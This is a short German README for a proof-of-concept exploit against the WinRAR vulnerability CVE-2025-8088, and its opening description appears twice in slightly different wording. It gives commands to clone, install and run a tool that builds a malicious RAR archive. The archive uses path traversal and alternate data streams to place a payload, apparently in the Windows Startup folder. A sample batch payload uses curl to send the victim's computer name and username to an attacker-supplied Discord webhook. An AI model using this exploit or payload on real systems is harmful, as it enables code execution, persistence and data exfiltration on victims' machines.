
Ein Proof-of-Concept-Exploit für die WinRAR-Sicherheitslücke (CVE-2025-8088), die Versionen 7.12 und niedriger betrifft. Dieses Tool erstellt ein schädliches RAR-Archiv, das Payloads in Alternate Data Streams (ADS) mit Path Traversal einbettet, was potenziell zur Ausführung beliebigen Codes führt.
Ein Proof-of-Concept-Exploit für die WinRAR-Sicherheitslücke (CVE-2025-8088), die Version 7.12 und ältere betrifft. Dieses Tool erstellt ein bösartiges RAR-Archiv, das Payloads in Alternate Data Streams (ADS) mit Path Traversal einbettet und möglicherweise zur Ausführung beliebigen Codes führt.
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088
# Install dependencies
pip install reportlab
# Run the exploit
python CVE-2025-8088.py
Bearbeiten Sie die Payload, um einen Discord-Webhook aufzurufen:
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
Ersetzen Sie YOUR_DISCORD_WEBHOOK_URL durch Ihre tatsächliche Webhook-URL.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\